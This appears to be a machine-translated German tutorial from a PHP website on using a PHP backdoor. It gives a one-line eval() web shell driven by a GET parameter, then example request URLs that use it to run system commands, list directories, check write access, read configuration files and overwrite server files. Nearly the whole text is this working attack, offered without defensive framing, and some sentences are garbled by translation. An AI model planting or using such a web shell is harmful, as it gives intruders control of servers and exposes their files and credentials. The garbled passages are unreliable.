Heim > Artikel > Backend-Entwicklung > Einige Verwendungsmöglichkeiten der PHP-Hintertür
Heute werden wir über einige der häufigsten Einsatzmöglichkeiten von Hintertüren in PHP sprechen
Schreiben Sie zunächst die einfachste Hintertür, die auch als Trojaner bezeichnet werden kann.
<?php eval($_GET['evl']);
Das war's, Sie haben viele Ausführungsberechtigungen auf diesem Server erhalten.
Wozu dient diese Szene?
Druckserverphpinfo
http://www.test.com/a.php?evl=phpinfo()
Überprüfen Sie, welche Dateien sich in einem Verzeichnis befinden
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
Überprüfen Sie, ob das Verzeichnis beschreibbar ist, und überprüfen Sie dann das beschreibbare Erstellen eine ausführbare Datei im Verzeichnis
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
Den Inhalt einer Datei abrufen, die im Allgemeinen zum Lesen der Konfiguration verwendet wird
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
Dateien in ein beschreibbares Verzeichnis schreiben
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
Okay, das Obige Der Teil hat im Grunde den Teil zerstört, der die Anzeige eines Servers vervollständigen kann. Versuchen wir, Rückschlüsse auf andere Funktionen zu ziehen.
Das obige ist der detaillierte Inhalt vonEinige Verwendungsmöglichkeiten der PHP-Hintertür. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!